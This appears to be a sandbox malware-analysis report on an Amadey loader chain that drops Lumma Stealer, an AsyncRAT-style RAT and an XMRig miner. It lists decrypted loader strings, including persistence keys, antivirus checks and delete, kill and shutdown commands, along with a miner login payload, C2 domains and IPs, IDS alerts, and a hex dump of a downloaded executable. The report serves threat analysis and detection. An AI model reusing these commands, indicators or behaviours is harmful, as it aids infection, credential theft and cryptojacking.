                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: S-%lu-
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: abc3bc1985
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: skotes.exe
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Startup
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: cmd /C RMDIR /s/q
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: rundll32
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Programs
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: %USERPROFILE%
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: cred.dll|clip.dll|
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: cred.dll
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: clip.dll
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: http://
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: https://
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: /quiet
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: /Plugins/
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: &unit=
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: shell32.dll
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: kernel32.dll
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: GetNativeSystemInfo
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: ProgramData\
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: AVAST Software
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Kaspersky Lab
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Panda Security
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Doctor Web
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: 360TotalSecurity
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Bitdefender
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Norton
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Sophos
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Comodo
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: WinDefender
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: 0123456789
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: ------
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: ?scr=1
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: ComputerName
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: -unicode-
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: VideoID
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: DefaultSettings.XResolution
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: DefaultSettings.YResolution
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: ProductName
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: CurrentBuild
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: rundll32.exe
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: "taskkill /f /im "
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: " && timeout 1 && del
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: && Exit"
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: " && ren
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: Powershell.exe
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: -executionpolicy remotesigned -File "
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: shutdown -s -t 0
                              Source: 00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmpString decryptor: random
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00419A00 CryptUnprotectData,13_2_00419A00

                              Exploits

                              barindex
                              Source: Yara matchFile source: 10.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000A.00000002.1939471924.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

                              Bitcoin Miner

                              barindex
                              Source: global trafficTCP traffic: 192.168.2.9:51780 -> 162.19.139.184:2222 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4a8mevpr5km4ny7bkpdqgjdkghb22gtal9mhtqkbjxwwj329evfhevcvzck7euh5nedpu5dvaeppocr2bznv1zjnlkvr1aa.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                              Source: global trafficTCP traffic: 192.168.2.9:51782 -> 162.19.139.184:2222 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4a8mevpr5km4ny7bkpdqgjdkghb22gtal9mhtqkbjxwwj329evfhevcvzck7euh5nedpu5dvaeppocr2bznv1zjnlkvr1aa.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                              Source: Mc3FDUMnVz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51681 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51682 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51685 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51689 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51690 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51692 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51694 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51698 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.9:51761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.9:51764 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51769 version: TLS 1.2
                              Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: Fe36XBk.exe, 0000000A.00000003.1910049525.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1939471924.0000000000410000.00000040.00000001.01000000.00000009.sdmp
                              Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1943694439.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Purpose.pdb source: Ryu8yUx.exe, 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000C.00000000.2135542163.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, Ryu8yUx[1].exe.7.dr
                              Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: Fe36XBk.exe, 0000000A.00000002.1945694589.0000000005066000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1943694439.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: Fe36XBk.exe, 0000000A.00000002.1945694589.0000000005066000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 0000000A.00000002.1948214053.000000000719E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Stamp_Setup.tmp, 00000018.00000003.2651445491.00000000021F2000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000003.2648285782.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000001A.00000003.2661533392.0000000002180000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.26.dr, _isdecmp.dll.24.dr
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ebx, ecx13_2_0040F060
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]13_2_0043E150
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov edx, ecx13_2_0043E150
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then push esi13_2_00419A00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then jmp eax13_2_00419A00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h13_2_00419A00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]13_2_0040F4DA
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ecx, eax13_2_00443EA7
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov word ptr [ecx], dx13_2_004436B9
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi+3D954FEDh]13_2_0040CFD3
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov byte ptr [ebx], cl13_2_00431800
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h13_2_0042D831
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, eax13_2_0041A8BA
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then lea edi, dword ptr [esi+esi]13_2_0043314D
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov word ptr [ebx], cx13_2_00426150
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx eax, byte ptr [ecx+esi]13_2_00429970
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ecx, eax13_2_0042B175
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]13_2_0040C920
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh13_2_004019E0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then push eax13_2_004431FF
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]13_2_0040A240
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]13_2_0040A240
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h13_2_00430A40
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_0043B250
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov byte ptr [edi], al13_2_0041FA3E
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+759F8BA2h]13_2_00444280
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then lea edi, dword ptr [esi+esi]13_2_004330DC
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h13_2_00420AB0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]13_2_00423340
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]13_2_00418B60
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh13_2_00445B00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+0C61266Ch]13_2_00445B00
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ecx, eax13_2_0041F3C0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then push esi13_2_0042B3D3
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+06h]13_2_0040E380
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ecx, eax13_2_0040DB91
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov eax, ebx13_2_0040FB9E
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+2F3FA6E8h]13_2_00441BA0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h13_2_00441BA0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, ecx13_2_0041BC47
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, ecx13_2_0041A733
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh13_2_00418C20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then jmp eax13_2_00418C20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], E40A7173h13_2_00418C20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov byte ptr [edx], bl13_2_0040C4C0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, ecx13_2_0041BCF6
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx-07h]13_2_0042ED44
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ecx, eax13_2_0042ED44
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov word ptr [edi], ax13_2_0040FD7A
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, eax13_2_0041B500
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+02h]13_2_00442D3C
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh13_2_00426650
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1D78B1A5h]13_2_0041FE58
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], B130B035h13_2_00445E70
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then dec ebx13_2_00444625
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E389C079h13_2_0043EE20
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4802CC78h13_2_0041DEF0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+04h]13_2_0041DEF0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, ecx13_2_0041DEF0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov edi, ecx13_2_0041DEF0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov word ptr [ecx], bp13_2_00420F54
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx]13_2_0042DF66
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov word ptr [ecx], bp13_2_00420F67
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov byte ptr [ebx], cl13_2_00431703
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]13_2_00430F10
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_0042F7E0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then mov esi, ecx13_2_0041AFF7
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]13_2_00402780
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000000EFh]13_2_0041BF8A

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:51665 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:51669 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.9:51666
                              Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.2.9:51679
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:51683 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.9:51677
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:51671 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:51681 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:51681 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:51682 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:51682 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:51694 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:51694 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:51698 -> 188.114.96.3:443
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 140.82.121.3 443
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.88.203.169 39001
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 162.159.133.233 443
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.199.111.133 443
                              Source: Malware configuration extractorURLs: importenptoc.com
                              Source: Malware configuration extractorURLs: voicesharped.com
                              Source: Malware configuration extractorURLs: inputrreparnt.com
                              Source: Malware configuration extractorURLs: torpdidebar.com
                              Source: Malware configuration extractorURLs: rebeldettern.com
                              Source: Malware configuration extractorURLs: actiothreaz.com
                              Source: Malware configuration extractorURLs: garulouscuto.com
                              Source: Malware configuration extractorURLs: breedertremnd.com
                              Source: Malware configuration extractorIPs: 185.215.113.43
                              Source: global trafficTCP traffic: 93.88.203.169 ports 39001,0,1,56001,5,6
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
                              Source: global trafficTCP traffic: 192.168.2.9:51679 -> 93.88.203.169:56001
                              Source: global trafficTCP traffic: 192.168.2.9:51780 -> 162.19.139.184:2222
                              Source: global trafficTCP traffic: 192.168.2.9:51487 -> 1.1.1.1:53
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:50:08 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 